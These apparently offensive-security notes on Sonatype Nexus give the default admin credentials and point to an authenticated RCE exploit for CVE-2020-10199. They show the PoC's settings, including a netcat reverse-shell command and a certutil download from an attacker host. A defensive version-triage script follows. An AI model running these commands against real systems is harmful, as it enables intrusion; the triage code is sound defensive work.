Sonatype Nexus

Sonatype Nexus Repository is a repository manager that stores, organizes, and distributes software components, binaries, and build artifacts. It supports multiple package formats such as Maven, npm, NuGet, and Docker, allowing development teams to centralize dependencies and manage versioning efficiently. In offensive operations, Nexus can be a target for artifact manipulation, credential discovery, or lateral movement, as improperly secured repositories may expose sensitive binaries or access tokens.

Default Credentials

The default credentials on versions <3.17 are admin:admin123. On versions ≥3.17 there is no fixed default password: a random one is generated during installation and written to /nexus-data/admin.password, and the installer prompts for it to be changed on first login.

Authenticated RCE

Sonatype Nexus Repository versions before 3.21.2 are affected by a Java Expression Language (JavaEL) injection vulnerability (CVE-2020-10199). This flaw allows an authenticated attacker to inject and execute arbitrary Java code on the server by manipulating inputs that are evaluated as JavaEL expressions. A working PoC is available:

$ searchsploit nexus 3.21
Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated) | java/webapps/49385.py

The PoC below achieves RCE once the following variables are modified to match the target:

URL='http://192.168.156.61:8081'
#CMD='certutil.exe -urlcache -split -f http://192.168.45.241/nc.exe nc.exe'
CMD='nc.exe -e cmd.exe 192.168.45.241 443'
USERNAME='nexus'
PASSWORD='nexus'
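The two sections above give a defender two version thresholds to act on: instances older than 3.17 may still carry the admin:admin123 default, and instances older than 3.21.2 are exposed to CVE-2020-10199. The following triage helper is an added example written for these notes, not part of the original page or of any Sonatype tooling. It assumes that a Nexus 3 instance identifies itself with an HTTP Server header of the form Nexus/3.21.1 (OSS) (treat that format as an assumption and adjust the regex if your instances differ); the sample headers are constructed, not captured from real hosts.

```python
"""Version triage for Nexus 3 inventories (added example, not Sonatype's code).

Assumptions: the Server header looks like 'Nexus/3.21.1 (OSS)'; the two
thresholds below come from the notes above (default admin password before
3.17, CVE-2020-10199 fixed in 3.21.2).
"""
import re
from typing import Dict, Optional, Tuple

Version = Tuple[int, int, int]

# Thresholds taken from the notes above.
DEFAULT_CREDS_FIXED: Version = (3, 17, 0)   # random admin.password from 3.17 on
JAVAEL_RCE_FIXED: Version = (3, 21, 2)      # CVE-2020-10199 fixed in 3.21.2

# Constructed sample Server headers (not from real hosts).
SAMPLE_HEADERS = {
    "legacy": "Nexus/3.14.0-04 (OSS)",
    "mid": "Nexus/3.20.1-01 (OSS)",
    "fixed": "Nexus/3.21.2-03 (PRO)",
    "not-nexus": "nginx/1.18.0",
}

# Matches 'Nexus/<major>.<minor>.<patch>'; the '-NN' build suffix is ignored.
_VERSION_RE = re.compile(r"Nexus/(\d+)\.(\d+)\.(\d+)")


def parse_nexus_version(server_header: str) -> Optional[Version]:
    """Return (major, minor, patch) from a Server header, or None if not Nexus."""
    m = _VERSION_RE.search(server_header)
    if m is None:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def assess(server_header: str) -> Dict[str, object]:
    """Map one Server header to the findings a defender should act on.

    Returns {'version': tuple or None, 'findings': {id: remediation text}}.
    Tuple comparison gives correct ordering, e.g. (3, 9, 0) < (3, 17, 0).
    """
    version = parse_nexus_version(server_header)
    findings: Dict[str, str] = {}
    if version is None:
        return {"version": None, "findings": findings}

    if version < DEFAULT_CREDS_FIXED:
        findings["default-credentials"] = (
            "Release predates the generated admin.password; verify that "
            "admin:admin123 no longer works and rotate the admin credential."
        )
    if version < JAVAEL_RCE_FIXED:
        findings["CVE-2020-10199"] = (
            "JavaEL injection (authenticated RCE); upgrade to 3.21.2 or later "
            "and review accounts that hold elevated roles in the meantime."
        )
    return {"version": version, "findings": findings}


def triage(headers: Dict[str, str]) -> Dict[str, Dict[str, object]]:
    """Run assess() over a host-name -> Server-header inventory."""
    return {host: assess(hdr) for host, hdr in headers.items()}


if __name__ == "__main__":
    for host, result in triage(SAMPLE_HEADERS).items():
        print(host, result["version"], sorted(result["findings"]))
```

Feeding the output of an inventory scan (host name plus observed Server header) into triage() gives a per-host list of finding identifiers that can be pushed straight into a ticketing or SIEM enrichment step; the build suffix (-04, -01) is deliberately dropped because the thresholds above are expressed at the major.minor.patch level.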
